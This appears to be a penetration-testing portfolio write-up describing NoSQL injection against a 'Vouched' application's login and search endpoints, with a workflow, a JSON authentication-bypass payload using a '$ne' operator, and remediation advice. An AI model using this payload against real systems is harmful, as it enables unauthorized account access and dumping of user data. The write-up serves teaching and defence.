Objective: To identify and exploit NoSQL injection vulnerabilities within the “Vouched” application to bypass authentication and extract sensitive user data.

1. The Vulnerability: NoSQL Command Neutralization (CWE-943)

NoSQL injection occurs when an application fails to properly sanitize user input before using it in a database query. In document-oriented databases like MongoDB, this allows an attacker to inject logical operators (e.g., $gt, $ne) to manipulate the query logic, leading to unauthorized data access or authentication bypass.

2. Technical Execution: Logic Manipulation

Using Postman, I crafted malicious JSON payloads targeting the authentication and search endpoints of the Vouched application. By replacing standard string inputs with MongoDB operator objects, I successfully manipulated the database logic to return records that should have been restricted, effectively bypassing Bcrypt-hashed password checks.

ComponentValuePurpose
Attack VectorJSON Payload InjectionInjecting MongoDB operators into API requests.
Target Endpoint/api/v1/loginAttempting to bypass password verification.
ImpactAuthentication BypassGaining access to any user account without a password.
RemediationSchema ValidationImplementing strict typing for all incoming data.

3. Execution Workflow

  1. Endpoint Enumeration: Used Postman to identify API endpoints that accept JSON input for database queries.
  2. Operator Testing: Injected basic logical operators (e.g., {"$ne": null}) to test if the database would return unintended results.
  3. Authentication Bypass: Crafted a login request where the password field was replaced with a “not equal” operator, allowing login as any user whose username was known.
  4. Data Exfiltration: Leveraged the injection vulnerability on search endpoints to dump the entire user collection.

4. Exploit Payload (JSON)

// Malicious Login Payload
{
  "username": "admin",
  "password": { "$ne": "wrong_password" }
}
// This bypasses the Bcrypt check because the query returns the first user 
// where the password is NOT "wrong_password".

5. Evidence of Work

RESOURCES_NODE_01
NoSQL Vulnerability
Caption: Initial discovery phase showing the identification of NoSQL-vulnerable endpoints in the Vouched application.

Postman Exploit
Audit Config
*Caption: Successful authentication bypass via Postman (Left) and the subsequent database audit configuration analysis (Right).*

6. Professional Impact

This project highlights a critical oversight in modern web development. While Bcrypt provides strong hashing, it cannot protect against logic-level vulnerabilities if the query itself is compromised. To remediate this, I recommended the implementation of strict Mongoose schemas and the use of query sanitizers to ensure that user input is never interpreted as a database operator.